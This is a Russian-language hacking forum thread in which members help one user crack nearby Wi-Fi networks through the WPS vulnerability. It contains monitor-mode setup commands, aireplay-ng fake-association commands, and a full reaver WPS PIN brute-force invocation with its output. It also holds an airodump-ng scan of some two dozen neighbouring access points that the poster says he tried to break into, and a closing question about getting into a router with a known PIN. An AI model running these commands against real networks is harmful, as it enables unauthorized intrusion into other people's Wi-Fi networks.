Уязвимость в протоколе Wi-Fi Protected Setup

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by gpuhash, 30 Dec 2011.

  1. Triton_Mgn

    Triton_Mgn Elder - Старейшина

    Joined:
    6 Jul 2015
    Messages:
    3,657
    Likes Received:
    5,792
    Reputations:
    51
    что говорит , airodump-ng скрин.
    Какой адаптер , 3070 ни о чем не говорит.
     
    Alexmeh likes this.
  2. Kevin Shindel

    Kevin Shindel Elder - Старейшина

    Joined:
    24 May 2015
    Messages:
    1,011
    Likes Received:
    1,192
    Reputations:
    62
    А я вхожу в режим монитора без airmon'a, попробуй так...

    ifconfig wlan0 down
    iwconfig wlan0 mode monitor
    ifconfig wlan0 up
     
    quite gray and Triton_Mgn like this.
  3. Triton_Mgn

    Triton_Mgn Elder - Старейшина

    Joined:
    6 Jul 2015
    Messages:
    3,657
    Likes Received:
    5,792
    Reputations:
    51
    В Kali -Rolling по таким командам ничего не происходит, извратили Backtrack донельзя.
    И airmon-ng check kill нужен чтобы убить непонятные процессы, мрак.
     
  4. Alexmeh

    Alexmeh Elder - Старейшина

    Joined:
    19 Nov 2015
    Messages:
    2,344
    Likes Received:
    20,037
    Reputations:
    96
    В свое время у меня при переборе с флагом "А" и ассоциации с точкой в другом окне ривер пин пропустил. Так что команду: aireplay-ng -1 5 -a [MAC] wlan0
    применяю только для проверки ассоциации с точкой.
    Как вариант попробовать все проделать на WiFiSlax
     
    Triton_Mgn likes this.
  5. mybitco

    mybitco Member

    Joined:
    14 Jun 2015
    Messages:
    66
    Likes Received:
    9
    Reputations:
    0
    вместо скрина, ответ на команду airodump-ng wlan1 ,выглядет так:
    CH 5 ][ Elapsed: 42 s ][ 2016-08-14 19:08
    BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
    00:11:22:33:44:55 -27 25 2 0 4 54e. WPA2 CCMP PSK abcNetwork

    список разумеется побольше (штук 25 точек находится).

    Сигнал сильный от тех точек которые пытался ломануть.

    Адаптер брал на алиэкспрессе, если тут можно то могу потом ссылку дать, сам адаптер выглядет как альфа только с 2-мя антеннами.
     
  6. Triton_Mgn

    Triton_Mgn Elder - Старейшина

    Joined:
    6 Jul 2015
    Messages:
    3,657
    Likes Received:
    5,792
    Reputations:
    51
    Что это за палевый mac
     
  7. Triton_Mgn

    Triton_Mgn Elder - Старейшина

    Joined:
    6 Jul 2015
    Messages:
    3,657
    Likes Received:
    5,792
    Reputations:
    51
    давай весь список
     
  8. mybitco

    mybitco Member

    Joined:
    14 Jun 2015
    Messages:
    66
    Likes Received:
    9
    Reputations:
    0
    Попробовал, но ничего не изменилось, вот последовательность моих действий:
    1. iwconfig
    2. ifconfig wlan0 down
    3. ifconfig wlan1 down
    4. iwconfig wlan1 mode monitor
    5. ifconfig wlan1 up
    6. airodump-ng wlan1
    7. wash -i wlan1 -C
    8. aireplay-ng -1 100 -a 00:11:22:33:44:55 -e abcNetwork wlan1
    (предыдущая команда завершилась неудачно, но следующую в новом окне запускаю)
    9. reaver -i wlan1 -b 00:11:22:33:44:55 -vv -c 6 -aAwSNE

    после 8. aireplay-ng -1 100 -a 00:11:22:33:44:55 -e abcNetwork wlan1
    получаю:
    root@kali:~# aireplay-ng -1 100 -a 00:11:22:33:44:55 wlan1
    No source MAC (-h) specified. Using the device MAC (11:11:11:11:11:11)
    19:13:33 Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 6
    19:13:43 No such BSSID available.
    Please specify an ESSID (-e).

    (добавил название точки доступа)
    root@kali:~# aireplay-ng -1 100 -a 00:11:22:33:44:55 -e abcNetwork wlan1mon
    No source MAC (-h) specified. Using the device MAC (11:11:11:11:11:11)
    17:58:03 Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 1
    17:58:13 No such BSSID available.

    (взял другую точку доступа)
    root@kali:~# aireplay-ng -1 100 -a 00:11:22:33:44:55 -e abcNetwork wlan1mon
    No source MAC (-h) specified. Using the device MAC (11:11:11:11:11:11)
    17:58:03 Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 1
    17:58:13 No such BSSID available.

    (в другом окне запускаю)
    root@kali:~# reaver -i wlan1 -b 00:11:22:33:44:55 -vv -c 6 -aAwSNE
    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
    mod by t6_x <[email protected]> & DataHead & Soxrok2212
    [+] Switching wlan1 to channel 6
    [+] Waiting for beacon from 00:11:22:33:44:55
    [+] Associated with 00:11:22:33:44:55 (ESSID: abcNetwork)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    ...
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [!] WARNING: 25 successive start failures
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
     
  9. Triton_Mgn

    Triton_Mgn Elder - Старейшина

    Joined:
    6 Jul 2015
    Messages:
    3,657
    Likes Received:
    5,792
    Reputations:
    51
    список airodump-ng , же.
     
  10. mybitco

    mybitco Member

    Joined:
    14 Jun 2015
    Messages:
    66
    Likes Received:
    9
    Reputations:
    0
    А зачем мне палить чей-то реальный MAC?

    А смысл? (Если надо я конечно могу его запостить)
     
  11. Triton_Mgn

    Triton_Mgn Elder - Старейшина

    Joined:
    6 Jul 2015
    Messages:
    3,657
    Likes Received:
    5,792
    Reputations:
    51
    В общем говоря ты не взломаешь эту сеть - это виртуальный WiFi может даже на базе Connectify-me, о чем говорит mac 11,22,,,,,, , скажу честно , даже не проводились тесты по ловле хендшейка из программ. Вывод - Ты можешь забыть о такой точке если не словишь хендшейк. Reaver бесполезен. Лови другую, завтра протестирую на Connectify

    P/S Никто не просил тебя палить mac , начало 3 элемента нам бы хватило, для определения как работает твой адаптер, ты так и не сказал - что это.
     
  12. mybitco

    mybitco Member

    Joined:
    14 Jun 2015
    Messages:
    66
    Likes Received:
    9
    Reputations:
    0
    Triton_Mgn, я ответил по поводу адаптера тут https://forum.antichat.ru/threads/310835/page-175#post-3981441

    вот список того что обнаружил мой адаптер:
    root@kali:~# airodump-ng wlan1
    CH 2 ][ Elapsed: 30 s ][ 2016-08-14 20:02
    BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
    C0:4A:00:00:00:00 -30 23 0 0 13 54e. WPA2 CCMP PSK <length: 0>
    AC:F1:DF:00:00:00 -44 13 0 0 2 54e WPA2 CCMP PSK abc01
    90:94:E4:00:00:00 -47 2 0 0 1 54e WPA2 CCMP PSK abc02
    D8:EB:97:00:00:00 -50 15 0 0 6 54e WPA2 CCMP PSK abc03
    F8:BF:09:00:00:00 -54 16 0 0 6 54e WPA2 CCMP PSK abc04
    C0:4A:00:00:00:00 -52 14 0 0 6 54e. WPA2 CCMP PSK abc05
    F8:1A:67:00:00:00 -59 14 3 1 11 54e. WPA2 CCMP PSK abc06
    74:EA:3A:00:00:00 -58 6 5 0 13 54e. WPA2 CCMP PSK abc07
    90:94:E4:00:00:00 -60 15 0 0 11 54e. WPA2 CCMP PSK abc08
    90:EF:68:00:00:00 -61 25 0 0 9 54e WPA2 CCMP PSK <length: 0>
    AC:F1:DF:00:00:00 -63 13 0 0 6 54e. WPA CCMP PSK abc09
    C4:A8:1D:00:00:00 -62 3 0 0 4 54e. WPA2 CCMP PSK abc10
    04:A1:51:00:00:00 -62 19 0 0 3 54e. WPA TKIP PSK abc11
    C8:BE:19:00:00:00 -63 22 0 0 1 54e WPA2 CCMP PSK abc11
    DC:9F:DB:00:00:00 -67 13 0 0 39 54e. WPA2 CCMP PSK <length: 0>
    90:F6:52:00:00:00 -66 10 0 0 6 54e. WEP WEP abc12
    64:70:02:00:00:00 -67 14 2 0 11 54e. WPA2 CCMP PSK abc13
    DC:9F:DB:00:00:00 -67 15 0 0 38 54e. WPA2 CCMP PSK <length: 0>
    14:D6:4D:00:00:00 -72 19 0 0 13 54e. WPA2 CCMP PSK abc14
    C4:6E:1F:00:00:00 -69 11 0 0 6 54e. WPA2 CCMP PSK abc15
    6A:28:5D:00:00:00 -71 14 0 0 11 54e WPA2 CCMP PSK abc16
    00:1C:F0:00:00:00 -71 4 0 0 6 54 . WPA2 CCMP PSK abc17
    F0:7D:68:00:00:00 -73 18 0 0 1 54e. WPA2 CCMP PSK abc18
    E0:3F:49:00:00:00 -72 6 0 0 4 54e WPA2 CCMP PSK abc19
    1C:AF:F7:00:00:00 -71 9 0 0 11 54e. WPA2 CCMP PSK abc20
    F8:BF:09:00:00:00 -72 2 0 0 7 54e WPA2 CCMP PSK abc21
    EC:43:F6:00:00:00 -73 4 0 0 4 54e WPA2 CCMP PSK abc22
    C8:BE:19:00:00:00 -74 4 0 0 11 54e WPA2 CCMP PSK abc23
    C4:04:15:00:00:00 -75 13 0 0 11 54e WPA2 CCMP PSK abc24

    MACи и названия точек чтобы не палить немного изменил
     
  13. Triton_Mgn

    Triton_Mgn Elder - Старейшина

    Joined:
    6 Jul 2015
    Messages:
    3,657
    Likes Received:
    5,792
    Reputations:
    51
    Я понял, что за адаптер в третий раз спрашиваю.
     
  14. mybitco

    mybitco Member

    Joined:
    14 Jun 2015
    Messages:
    66
    Likes Received:
    9
    Reputations:
    0
    вроде так он называется на алиэкспрессе(прямо сейчас не посмотреть точно)
    long rang BT-N9100 Beini USB Wifi Adapter Wireless Network Card Ralink 3070 High Power 3000mW Dual Antenna
     
  15. Triton_Mgn

    Triton_Mgn Elder - Старейшина

    Joined:
    6 Jul 2015
    Messages:
    3,657
    Likes Received:
    5,792
    Reputations:
    51
    Со всеми точками такая беда?
     
  16. Triton_Mgn

    Triton_Mgn Elder - Старейшина

    Joined:
    6 Jul 2015
    Messages:
    3,657
    Likes Received:
    5,792
    Reputations:
    51
    зайди лучше со своим адаптером в тему https://forum.antichat.ru/threads/57249/ Список адаптеров пригодных, вопросы решаться само собой. То , что твой адаптер на Ralinke 3070 -все фигня, а потом приходи сюда, мы поможем.
     
  17. Triton_Mgn

    Triton_Mgn Elder - Старейшина

    Joined:
    6 Jul 2015
    Messages:
    3,657
    Likes Received:
    5,792
    Reputations:
    51
    Это фейк/ альфа мощная 1000 mw/
     
  18. Triton_Mgn

    Triton_Mgn Elder - Старейшина

    Joined:
    6 Jul 2015
    Messages:
    3,657
    Likes Received:
    5,792
    Reputations:
    51
    Посчитай сам по закону Ома , USB -5 Вольт, 0.5 Ампер.
     
  19. mybitco

    mybitco Member

    Joined:
    14 Jun 2015
    Messages:
    66
    Likes Received:
    9
    Reputations:
    0
    Спасибо, сейчас там спрошу, тем более что уже откопал ссылку на алиэкспрессе на мой девайс.

    С теми которыми пробовал со всеми :(
     
  20. Modern888

    Modern888 New Member

    Joined:
    16 Feb 2016
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    Ребят, подскажите.
    На точке Dir-320nru выключили WPS и сменили пароль (WPA2).
    Можно ли взломать/подключиться зная пин код? (Windows 7, AirSlax).